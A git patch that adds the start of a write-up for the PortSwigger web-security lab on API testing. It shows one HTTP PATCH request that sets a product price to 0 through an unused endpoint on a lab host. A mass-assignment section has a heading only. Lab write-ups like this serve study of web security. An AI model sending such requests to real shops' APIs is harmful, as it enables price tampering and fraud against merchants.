From fa6da2d20d7dfb073f7d9e65d594695ef405233d Mon Sep 17 00:00:00 2001
From: Fabio Zuber <fabio.zuber@ntc.swiss>
Date: Tue, 14 May 2024 14:14:41 +0200
Subject: [PATCH] feat(bscp): start with api testing labs

---
 .../2023/portswigger-bscp-labs/api-hacking.md | 20 +++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 docs/writeups/2023/portswigger-bscp-labs/api-hacking.md

diff --git a/docs/writeups/2023/portswigger-bscp-labs/api-hacking.md b/docs/writeups/2023/portswigger-bscp-labs/api-hacking.md
new file mode 100644
index 0000000..7c8db90
--- /dev/null
+++ b/docs/writeups/2023/portswigger-bscp-labs/api-hacking.md
@@ -0,0 +1,20 @@
+# API Testing
+
+## Finding and exploiting an unused API endpoint
+
+The `price` endpont not only allows the `GET` methode but also `PATCH` 
+
+```
+PATCH /api/products/1/price HTTP/2
+Host: 0ad10068036333308060530f007800d6.web-security-academy.net
+Cookie: session=f1t8Tfqc7LY7RwwMuWYwYG5mA2CxkpFc
+[...]
+Content-Type: application/json;charset=UTF-8
+Content-Length: 12
+
+{"price": 0}
+```
+
+## Exploiting a mass assignment vulnerability
+
+